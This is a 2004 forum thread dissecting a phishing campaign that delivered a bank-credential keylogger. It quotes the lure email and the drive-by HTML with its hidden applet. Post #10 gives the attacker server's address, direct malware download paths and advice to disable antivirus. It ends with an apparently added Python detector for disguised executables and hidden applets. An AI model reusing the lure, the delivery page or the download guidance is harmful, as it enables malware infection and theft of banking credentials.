-
February 16th, 2004, 06:18 PM
#1
owned as we speak
How current can you get? Thought you might like to take a look at a crime in progress:
220-Connecting To MegaCrew's l337 FTP Server....
220-.:::::::::::::::::::::::
220-.::: ____________________________________________________
220-.:::| ╕,°ñ░`░ñ°,╕╕╕╕╕╕╕╕╕╕╕
220-.:::| .Welcome to
220-.:::| MegaCrew
220-.:::| ``````````░ñ°,╕╕,°ñ░`
220-.:::|____________________________________________________
220-.:::::::::::::::::::::::
220-.:::|____________________________________________________
220-.:::| USER INFO:
220-.:::|
220-.:::| ñ Your IP Address : xx.xxx.xx.xxx
220-.:::| ñ Current Time : 11:55:34
220-.:::| ñ Current Date : Monday 16 February, 2004
220-.:::|____________________________________________________
220-.:::::::::::::::::::::::
This is from the server used to download a keylogger that looks only for info on bank accounts, then emails it to a '.ru' mail server. The originating address of the email is in China, which is no doubt owned by someone from somewhere else.
Victims are lured to a website through an email:
Hello...
It has come to my attention that you are being under the police investigation.
Is that true? Have you really committed such crimes?
Please read the following article located at:
http://federalpolice.com:article872[...#39;1075686747
where they see what appears to be a server error page, which is actually a web page made to download an executable (through the MIME type vuln) named javautil.zip and execute it.
The web server that is being used is a completely owned server. (It's really disgraceful.)
The hacked server is still up ('1075686747') for anyone wanting to get a first-hand look at it, but the police have been notified and are probably watching it.
more info:
http://spamwatch.codefish.net.au/mod...article&sid=55
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
February 16th, 2004, 06:46 PM
#2
good work tedbob...how long have u been trackin this? how'd u find all this out? do they set up a backdoor also along with a keylogger?
-
February 16th, 2004, 06:54 PM
#3
Hmm. I saw an advisory about this one this morning. The advisory is from a paid security firm so I cannot post the info here.
Good find!
BE CAREFUL if you downloaded the javautil.zip (for educational purposes): it's NOT a zip file but an executable.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
February 16th, 2004, 07:03 PM
#4
This one started over the weekend. The first bits came out late Saturday and I've suggested to the original poster to get Antiphishing.com to look into posting it as well.
-
February 16th, 2004, 07:22 PM
#5
I just wanted to know how the javautil.zip can be made to auto-execute on one's machine; is it because the file is really called javautil.exe? Maybe this is a stupid question, but maybe you could tell me what the MIME type vuln looks like, to be aware when opening different web pages.
Don't you have your internet settings set so that there has to be authorization before a download is made into your computer?
Imagination is greater than intelligence when referring to intricate things, the reason why is that if you can\'t imagine how something works, how do you expect to understand it and therefore to know anything about it.
Imagination, Precious
-
February 16th, 2004, 07:38 PM
#6
the web server that is being used is a completely owned server. (it's really disgraceful)
*ROTFLMAO*
Holy crap! When you said completely you weren't kidding. Anybody else see that mess?
Not only does it look like 3 separate doors, it appears as if they didn't even need them in the first place. No pun intended.
This is a perfect example of why you need to lock down your machines. Not just patched either. Learn how some of this stuff actually works; if you don't need it, disable it. Granted, some of this stuff could have been enabled by the attacker.
Good find Tedob1 thanks for the humor.
/edit corrected name OOPS!
-
February 16th, 2004, 07:47 PM
#7
No prob. I've been called much, much worse.
To add insult to injury, the perps are using NetBus.
epolgar:
http://secunia.com/advisories/10736/
-
February 16th, 2004, 10:00 PM
#8
an added note from full-disclosure:
"one major issue left out by that link is the fact that it is not just a
keylogger, it also rapes the Protected Storage Subsystem, as is obvious
by the fact that it imports pstorec.dll, and calls PStoreCreateInstance.
Another interesting thing to note is that it can be uninstalled by
finding the EXE and running it with the "Uninstall" flag... "
-
February 16th, 2004, 10:15 PM
#9
I wonder if my firewall would catch it...is it safe to click on that link without having it execute on my PC. I'm using win2k/XP dual boot. Connected through 2k rite now. I would like to tear the program they're using appart to see what I learn from it. If you have the file, would you be able to post it as an attachment for me please.
-
February 16th, 2004, 10:26 PM
#10
64.29.173.91
After you connect it serves you the files automatically via an applet.
Here is the HTML:
<HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
<h2>SERVER ERROR 550</h2>
<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1></APPLET></BODY></HTML>
if you connect
64.29.173.91/blackbox.class
64.29.173.91/javautil.zip
you can save them that way
hope this helps
Norton will pick up blackbox.class so if you wanna keep it kill norton or any other AV for a moment.
Use at your own discretion
hope this helps
Your heart was talking, not your mind.
-Tiger Shark
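Two defensive checks that follow from this thread, as an added example and not code from any poster: post #3 notes that javautil.zip is really an executable, and post #10 shows the delivery page hiding the applet in a 1x1 pixel tag. The function names and the constructed "MZ" sample bytes are my own; the markup is the one quoted in post #10.

```python
# Added example (not code from the thread); function names are mine.
from html.parser import HTMLParser

ZIP_MAGIC = b"PK\x03\x04"   # local file header of a genuine zip archive
PE_MAGIC = b"MZ"            # DOS/PE executable header

def classify_archive(name: str, data: bytes) -> str:
    """Compare a file's extension with its magic bytes."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if name.lower().endswith(".zip") and data.startswith(PE_MAGIC):
        return "pe-disguised-as-zip"   # the mismatch post #3 warns about
    return "unknown"

def _dim(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None

class _AppletFinder(HTMLParser):
    """Collect <applet> tags that are effectively invisible (<= 1x1 pixel)."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "applet":          # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        w, h = _dim(a.get("width")), _dim(a.get("height"))
        if w is not None and h is not None and w <= 1 and h <= 1:
            self.hits.append({"archive": a.get("archive", ""),
                              "code": a.get("code", ""), "width": w, "height": h})

def find_hidden_applets(html: str) -> list:
    """Return every near-invisible applet found in the page markup."""
    p = _AppletFinder()
    p.feed(html)
    return p.hits

# Sample inputs: the markup quoted in post #10, plus a constructed fake "zip".
SAMPLE_HTML = ('<HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>'
               '<h2>SERVER ERROR 550</h2>'
               '<APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>'
               '</APPLET></BODY></HTML>')
FAKE_ZIP = b"MZ\x90\x00" + b"\x00" * 60   # constructed PE-like header, not the real file
```

Running `find_hidden_applets(SAMPLE_HTML)` flags the javautil.zip applet, and `classify_archive("javautil.zip", FAKE_ZIP)` reports the extension/magic mismatch.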